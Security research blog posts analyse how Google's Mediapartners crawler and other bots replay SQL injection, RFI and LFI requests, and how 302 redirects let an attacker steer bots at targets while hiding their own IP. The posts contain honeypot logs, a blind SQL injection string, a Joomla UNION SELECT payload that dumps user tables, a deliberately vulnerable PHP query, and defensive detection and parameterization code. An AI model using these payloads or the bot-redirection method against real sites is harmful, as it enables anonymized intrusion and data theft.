Posts tagged Mediapartners

Bots Command & Conquer

Some months ago, I became interested in suspicious alerts generated on our HoneyNet that were related to the dedicated Google AdSense “Mediapartners-Google*” bot.
The Mediapartners bot, as I understand it, works with the Google cache: when a visitor calls a new or existing web page that uses the AdSense JavaScript code and is not yet in the Google cache, the Mediapartners bot fetches that page.

If the URL first invoked by the visitor contains SQL injection, RFI, LFI or XSS parameters, the Mediapartners bot will replay the attack. So if you are vulnerable to these web attacks, you will get owned first by the visitor who invoked the vulnerable URL, then by the Mediapartners bot, which copies the visitor's action. I tested with SQL injection and RFI vulnerabilities: every time, my lab was owned a second time by the Mediapartners bot.

This bot behavior is interesting because you could design a web attack that requires two steps: the first step is made by the visitor's call, the second by the bot. For example, with an RFI vulnerability, the visitor's first call executes the “id.txt” code, and directly after that execution the original id.txt code could be automatically replaced by different code, which will then be called by the Mediapartners copycat bot.

The Mediapartners bot is not a “classical” search engine bot. A “classical” search engine bot visits your website depending on its popularity, and surely on other criteria, so you have no control over when it will come to visit you. In 2001, lcamtuf (aka Michal Zalewski) published a Phrack article, “Rise of the Robots”, which demonstrated that classical search engines, with their natural “link following” behavior, could also take part in hacking vulnerable websites. Just create a web page with thousands of SQL injection or RFI links; the search engine bot will follow the links and execute the web attacks. This technique is known as “link spam”. But as lcamtuf described, you have no control over the timing of the bot's visits.

With the Mediapartners bot we do control the timing, because we know the triggers that call the bot. You need a valid AdSense account, the AdSense JavaScript in your web page, and the web page must not be in the Google cache. It is quite easy to invoke the bot on demand: create random web pages that meet all the prerequisites and the job will be done. Bot invocation on demand.

But there is still a problem: the first invocation of the web page reveals your source IP, so the attack is not transparent.

“Classical” search engine bots have interesting features; for example, they react to 301 or 302 HTTP redirections. So you can redirect certain bots wherever you want. Just take a look at the following code, and replace “Bots” with a bot fingerprint:

I have tested the 302 redirection with the most common search engine bots, and have seen that most of them are “vulnerable”.

  • msnbot-media

C&C server – – [14/Jan/2011:21:56:38 +0100] “GET /random_url.php HTTP/1.1” 302 236957 “-” “msnbot-media/1.1 (+”

Target server – – [14/Jan/2011:21:56:40 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “msnbot-media/1.1 (+”
– – [14/Jan/2011:21:56:41 +0100] “GET / HTTP/1.1” 200 15146 “-” “msnbot-media/1.1 (+”

  • bingbot

C&C server – – [14/Jan/2011:22:34:49 +0100] “GET /random_url.php HTTP/1.1” 302 19847 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +”

Target server – – [14/Jan/2011:22:34:50 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +”
– – [14/Jan/2011:22:34:51 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +”

  • Yahoo! Slurp

– – [16/Jan/2011:09:08:55 +0100] “GET /random_url.php HTTP/1.0” 302 – “-” “Mozilla/5.0 (compatible; Yahoo! Slurp;”

  • Googlebot-Image

– – [14/Jan/2011:22:09:02 +0100] “GET /random_url.php HTTP/1.1” 302 71861 “-” “Googlebot-Image/1.0”

Every time, the bots executed the web attacks, and they were the only source IP of the attack. There is no need to reveal yourself directly for web hacking; the search engine bots will do the job for you. But as I explained, you have no control over when these bots are invoked.

After some research I discovered that the Mediapartners bot is also vulnerable to the 302 redirection. So you know how to call the bot, and you control it by redirecting it wherever you want.


Some random text

Here is the result. I still have to invoke the bot first, but the bot is then redirected to the target URL, hiding my source IP.

C&C server – – [13/Jan/2011:00:27:40 +0100] “GET /random_URL.php HTTP/1.1” 200 1290 “-” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.231 Safari/534.10”
– – [13/Jan/2011:00:27:42 +0100] “GET /random_URL.php HTTP/1.1” 302 1288 “-” “Mediapartners-Google”

Target server – – [13/Jan/2011:00:27:42 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mediapartners-Google”

What is interesting to see is that the Mediapartners bot's source IP on the C&C server is not the same as its source IP on the target server. The Mediapartners bots share orders between different source servers.

I now have a fully controllable bot; time and target are customizable. It is quite simple to create a C&C back-end that generates random web pages on demand and invokes the bot. After more tests, it turns out that the Mediapartners bot supports not only the HTTP and HTTPS protocols, but also FTP.

– – [15/Jan/2011:00:19:26 +0100] “GET /random_URL.php HTTP/1.1” 302 91754 “-” “Mediapartners-Google”

[email protected] ~]# tcpdump -n port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

00:19:27.956865 IP > S 1218834134:1218834134(0) win 5840
00:19:27.956983 IP > S 2218131910:2218131910(0) ack 1218834135 win 5792
00:19:27.972538 IP > . ack 1 win 92
00:19:27.973972 IP > P 1:266(265) ack 1 win 91
00:19:27.989653 IP > . ack 266 win 108
00:19:27.989864 IP > P 1:17(16) ack 266 win 108
00:19:27.989894 IP > . ack 17 win 91
00:19:27.990238 IP > F 266:266(0) ack 17 win 91
00:19:28.005937 IP > F 17:17(0) ack 267 win 108
00:19:28.005975 IP > . ack 18 win 91

Is the Mediapartners bot the only bot that is fully controllable? No 🙂 Another example is the Facebook “facebookexternalhit” bot. Here is the description of the bot:

“Facebook allows its users to send links to interesting web content to other Facebook users. Part of how this works on the Facebook system involves the temporary display of certain images or details related to the web content, such as the title of the webpage or the embed tag of a video. Our system retrieves this information only after a user provides us with a link.”

When you publish a URL in your Facebook wall status, the “facebookexternalhit” bot fetches the URL and caches the content for later delivery. So you control the bot's invocation. Facebook has some security mechanisms that do not permit you to publish a link on your wall containing SQL injection, RFI, LFI or XSS in its parameters.

But the “facebookexternalhit” bot is also vulnerable to 302 redirection, which lets you bypass that security mechanism.

C&C server – – [14/Jan/2011:22:40:57 +0100] “GET /random_URL.php HTTP/1.1” 302 65629 “-” “facebookexternalhit/1.1 (+”

Target server – – [14/Jan/2011:22:40:58 +0100] “GET / HTTP/1.1” 200 9545 “-” “facebookexternalhit/1.1 (+”

Just publish a “normal” link in your Facebook status; the bot will fetch the page and be directly redirected, for example, to a SQL injection URL. What is funny is that the result of the web attack will be displayed on your wall 🙂

Result of a 302 SQL injection in the title HTML tag

Result of a LFI web attack on a targeted server after 302 redirection

A lot of bots are vulnerable to different attacks. You never see them, but beware of them. I would like to thank jduck from the Metasploit Team for providing me with some useful information.

Google Mediapartners crawlers replaying web attacks

In the use case analysis SUC001, we discovered that Google Mediapartners crawlers seem to replay web attacks under certain conditions:

  • Your website needs to be a member of the AdSense network.
  • Your robots.txt file must not exclude the “Mediapartners-Google” crawler.
  • The targeted web page of your website must contain an AdSense banner.
  • The “Mediapartners-Google” crawler should visit your website frequently, ideally on every display of a web page.
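
The robots.txt condition above can be checked quickly. The following is a minimal sketch using Python's standard `urllib.robotparser`; the function name `adsense_crawler_allowed` and the two sample policies are assumptions made for illustration, and the sketch only reflects how Python's parser reads the rules, not necessarily how Google's crawler interprets them.

```python
from urllib.robotparser import RobotFileParser


def adsense_crawler_allowed(robots_txt: str, path: str = "/") -> bool:
    """Return True if this robots.txt text lets Mediapartners-Google fetch `path`."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch("Mediapartners-Google", path)


# Hypothetical policies, not taken from the original post.
open_policy = "User-agent: *\nDisallow: /private/\n"
blocking_policy = "User-agent: Mediapartners-Google\nDisallow: /\n"

print(adsense_crawler_allowed(open_policy))      # crawler may fetch "/"
print(adsense_crawler_allowed(blocking_policy))  # crawler is excluded
```

With the second policy the crawler is excluded, so the replay behavior described here should not be observable on that site.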

I have created a fake MySQL database named “injection”; you can find the fake content of this database below.

CREATE TABLE `injection` (
  `id` int(11) NOT NULL auto_increment,
  `password` varchar(255) NOT NULL,
  PRIMARY KEY  (`id`)
);

INSERT INTO `injection` (`id`, `password`) VALUES
(1, 'testtest'),
(2, 'testtesttest');

I granted the MySQL user “injection” only the SELECT privilege on the “injection” table, and only for local connections.

After creating all the SQL requirements, we need to create a PHP test page with an “id” parameter that is vulnerable to an SQL injection attack, for example “test2.php?id=2”.

$sql = "SELECT password FROM injection WHERE id=" . $_REQUEST['id'];

We also insert some good keywords into this web page (just copy and paste your favorite web article), along with the required AdSense banner. Now that everything is configured, we can see whether the Google Mediapartners crawlers will replay the SQL injection attack.

The SQL injection that will be played is the following:

SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

The web query produces this entry in the Apache log file:

- - [20/Apr/2010:22:48:45 +0200] "GET //test2.php?id=2%20AND%20ORD%28MID%28%28SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201%29%2C%2070%2C%201%29%29%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; fr-fr) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"

The MySQL log file shows this entry:

100420 22:48:45
419 Connect     [email protected] on
1419 Init DB     injection
1419 Query       SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

This HTTP query is followed a few seconds later by the Google Mediapartners crawler.

- - [20/Apr/2010:22:48:48 +0200] "GET //test2.php?id=2%20AND%20ORD(MID((SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201)%2C%2070%2C%201))%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mediapartners-Google"

And with no surprise, we can see in the MySQL log file that the crawler replays the SQL injection.

100420 22:48:48
1432 Connect     [email protected] on
1432 Init DB     injection
1432 Query       SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454
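
The two Apache entries are not byte-for-byte identical: the visitor's request percent-encodes the parentheses (%28, %29) while the crawler's request sends them literally. A small Python sketch (the helper name `injected_id` is an assumption for illustration) shows that both request URIs decode to the same “id” value, which matches the identical queries in the MySQL log:

```python
from urllib.parse import unquote

# Request URIs copied from the two Apache log entries.
visitor_uri = (
    "//test2.php?id=2%20AND%20ORD%28MID%28%28SELECT%204%20FROM%20"
    "information_schema.TABLES%20LIMIT%200%2C%201%29%2C%2070%2C%201%29%29"
    "%20%3E%2051%20AND%204454=4454"
)
crawler_uri = (
    "//test2.php?id=2%20AND%20ORD(MID((SELECT%204%20FROM%20"
    "information_schema.TABLES%20LIMIT%200%2C%201)%2C%2070%2C%201))"
    "%20%3E%2051%20AND%204454=4454"
)


def injected_id(uri: str) -> str:
    """Return the percent-decoded value of the single 'id' parameter."""
    query = uri.split("?", 1)[1]
    _name, _sep, value = query.partition("=")  # split at the first '=' only
    return unquote(value)


print(injected_id(visitor_uri) == injected_id(crawler_uri))
print("SELECT password FROM injection WHERE id=" + injected_id(crawler_uri))
```

Any log correlation should therefore compare decoded URLs rather than raw log strings.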

So, in conclusion, if your website is a member of the Google AdSense network, displays AdSense banners, is vulnerable, and is targeted by an SQL injection, you will be owned not only by the bad guys, but also by Google 🙂
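
The replay only matters because the test page concatenates the “id” parameter into the SQL text. As a contrast, here is a minimal sketch in Python, with an in-memory SQLite database standing in for MySQL (an assumption made so the example is self-contained). The payload `2 OR 1=1` is a hypothetical, simplified stand-in for the injection used in this test, and the function names are illustrative.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE injection (id INTEGER PRIMARY KEY, password TEXT NOT NULL)")
conn.executemany(
    "INSERT INTO injection (id, password) VALUES (?, ?)",
    [(1, "testtest"), (2, "testtesttest")],
)


def lookup_concatenated(raw_id: str):
    # Same pattern as the vulnerable PHP line: the input becomes part of the SQL text.
    sql = "SELECT password FROM injection WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(raw_id: str):
    # The input is bound as a value, so it can never change the query structure.
    return conn.execute(
        "SELECT password FROM injection WHERE id=?", (raw_id,)
    ).fetchall()


payload = "2 OR 1=1"  # hypothetical payload, not the one from the logs
print(len(lookup_concatenated(payload)))   # every row leaks
print(len(lookup_parameterized(payload)))  # no row matches the literal string
```

With a bound parameter, a replayed request, whether it comes from the attacker or from the crawler, has no effect on the query structure.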

SUC001 : Google Mediapartners crawlers owned ? SQL injection + RFI detected

  • Use Case Reference : SUC001
  • Use Case Title : Google Mediapartners crawlers owned ? SQL injection + RFI detected
  • Use Case Detection : HTTP Logs / Database Logs / IDS
  • Targeted Attack : N/A
  • Identified tool(s) : Google Mediapartners crawler
  • Source IP(s) : Google –
  • Source Countries : N/A
  • Source Port(s) : Random
  • Destination Port(s) : 80 TCP

Today, same as every day, I checked the ZATAZ HoneyNet activity for the last 24 hours, and detected an SQL injection attempt on one of our servers. As I am currently looking for a way to better attract SQL injection activity, I checked whether one of my tactics had produced results. Analyzing the data from the SQL injection attacks, I was surprised by the result.

The source IP of this SQL injection attempt belongs to Google, and more precisely to one of the Google Mediapartners crawlers, as confirmed by a whois lookup on the IP address.

Below you can find the activity of this Google Mediapartners crawler on our HoneyNet.

Current week google crawler activities

The count of 5 fingerprints for today is due to multiple pattern detections by the HoneyNet.

current month google crawler activities

This is not the only time in the current month that the Google crawler was detected as a potential source of an attack.

Most of the time, the crawler generates a lot of IDS false positives. We have to investigate further to decide whether these alerts are false positives or not.

google crawler event details

CIDs 133304 and 131291 are genuine false positives generated during indexing activity.

GET /news/8176/login.html HTTP/1.1
Connection: Keep-alive
Accept: */*
From: googlebot(at)
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +
Accept-Encoding: gzip,deflate
If-Modified-Since: Sun, 11 Apr 2010 07:58:58 GMT
All the CIDs from 2010-04-19 18:24:45 (GMT+2) belong to a single fingerprint, which is really interesting to investigate.
2010-04-19 18:24:45
GET /alerte-securite//index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- HTTP/1.1
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate
As you can see, there is a real SQL injection attempt. You can also see that the User-Agent (Mediapartners-Google) differs from that of the false-positive CIDs.
CID 129140 is not related to an SQL injection attempt but to an RFI (Remote File Inclusion) attempt, and its User-Agent is also Mediapartners-Google.
2010-04-09 07:06:59
GET /alerte-securite/20058/MassMirror-Uploader-GLOBALS%5BMM_ROOT_DIRECTORY%5D-upload_progress.php?GLOBALS%5BMM_ROOT_DIRECTORY%5D= HTTP/1.1
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate
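
To separate such requests from the indexing false positives, a rough heuristic on the decoded request URI can help. The following Python sketch is only an assumption about how one might triage such alerts, not the HoneyNet's actual detection logic. The SQL injection URI is a shortened copy of the request above; the RFI value `http://attacker.example/id.txt` is hypothetical, because the original value is not present in the capture.

```python
import re
from urllib.parse import unquote_plus

# Deliberately simple patterns; real IDS signatures are far more thorough.
SQLI_PATTERN = re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE)
RFI_PATTERN = re.compile(r"=\s*(https?|ftp)://", re.IGNORECASE)


def classify(request_uri: str) -> list:
    """Return the attack labels whose pattern matches the decoded URI."""
    decoded = unquote_plus(request_uri)
    labels = []
    if SQLI_PATTERN.search(decoded):
        labels.append("sqli")
    if RFI_PATTERN.search(decoded):
        labels.append("rfi")
    return labels


sqli_uri = (
    "/alerte-securite//index.php?option=com_properties&task=agentlisting"
    "&aid=-91+UNION+ALL+SELECT+1,2,version()"
)
rfi_uri = (
    "/alerte-securite/20058/MassMirror-Uploader-GLOBALS%5BMM_ROOT_DIRECTORY%5D-"
    "upload_progress.php?GLOBALS%5BMM_ROOT_DIRECTORY%5D=http://attacker.example/id.txt"
)
benign_uri = "/news/8176/login.html"

for uri in (sqli_uri, rfi_uri, benign_uri):
    print(classify(uri), uri[:40])
```

The benign Googlebot request from the false-positive CIDs gets no label, while the two Mediapartners-Google requests are flagged.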
Mediapartners-Google is the User-Agent of a dedicated crawler for Google AdSense, the advertising network. This robot analyzes pages that display AdSense ads in order to target the ads to the page content. Normally, sites that do not show AdSense ads do not get visits from this crawler. The Google Mediapartners bot uses the same cache as the standard indexing bot (Googlebot).
If you focus only on these CIDs, you will not have a complete overview of how these alerts were generated. You need to investigate the timeframe (± 1 minute) around these alerts.
A few seconds before the Google Mediapartners crawler generated its alert, at “2010-04-19 18:24:40”, another alert was generated by a different IP address with exactly the same URL pattern.
2010-04-19 18:24:40

Source Address :

GET /alerte-securite//index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6 ()
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=ao791k1rtkmhqdhko9palil7r7; zatazsession_id=e356c332d8eba6d3bba2023c13cecc8a; __qca=P0-1134447578-1271694138756; __utma=163730740.1460337807.1271694138.1271694138.1271694138.1; __utmb=163730740.1.10.1271694138; __utmc=163730740; __utmz=163730740.1271694144.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|

We can see that after this IP address accessed a web page containing AdSense ads, the Mediapartners Google bot immediately re-indexed the same page, replaying exactly the same query containing the SQL injection attempt.
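
This kind of timeframe investigation can be automated. The sketch below, in Python, pairs each Mediapartners-Google request with earlier non-crawler requests for the same decoded URI inside a one-minute window. The `Hit` structure, the `find_replays` function and the source addresses (taken from the 192.0.2.0/24 documentation range) are assumptions for illustration; the timestamps and user agents come from the two requests above, and the URI is shortened.

```python
from datetime import datetime, timedelta
from typing import NamedTuple
from urllib.parse import unquote

CRAWLER_UA = "Mediapartners-Google"


class Hit(NamedTuple):
    when: datetime
    source: str
    user_agent: str
    uri: str


def find_replays(hits, window=timedelta(minutes=1)):
    """Return (visitor_hit, crawler_hit) pairs where the crawler repeats a URI."""
    ordered = sorted(hits, key=lambda h: h.when)
    replays = []
    for index, hit in enumerate(ordered):
        if CRAWLER_UA not in hit.user_agent:
            continue
        for earlier in ordered[:index]:
            if CRAWLER_UA in earlier.user_agent:
                continue
            # Compare decoded URIs: the crawler may encode characters differently.
            same_uri = unquote(earlier.uri) == unquote(hit.uri)
            if same_uri and hit.when - earlier.when <= window:
                replays.append((earlier, hit))
    return replays


ATTACK_URI = (
    "/alerte-securite//index.php?option=com_properties&task=agentlisting"
    "&aid=-91+UNION+ALL+SELECT+1,2,version()"
)
hits = [
    Hit(datetime(2010, 4, 19, 18, 24, 40), "192.0.2.10",
        "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6",
        ATTACK_URI),
    Hit(datetime(2010, 4, 19, 18, 24, 45), "192.0.2.20", CRAWLER_UA, ATTACK_URI),
]

for visitor, crawler in find_replays(hits):
    delay = (crawler.when - visitor.when).seconds
    print(visitor.source, "->", crawler.source, "after", delay, "seconds")
```

A pair reported here points to the visitor as the real origin of the attack, with the crawler hit being a replay.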

It is clearly a false positive: Google is not targeting your website with SQL injection or RFI attack attempts. The bot is only replaying what previous attackers attempted.

This point is interesting because if, for example, the SQL injection was successful, the content of your database would normally be displayed in the web page. A few seconds later, the Google Mediapartners bot replays the same SQL injection query: will it index the database content displayed in the web page? After some deeper investigation, it seems that it does.
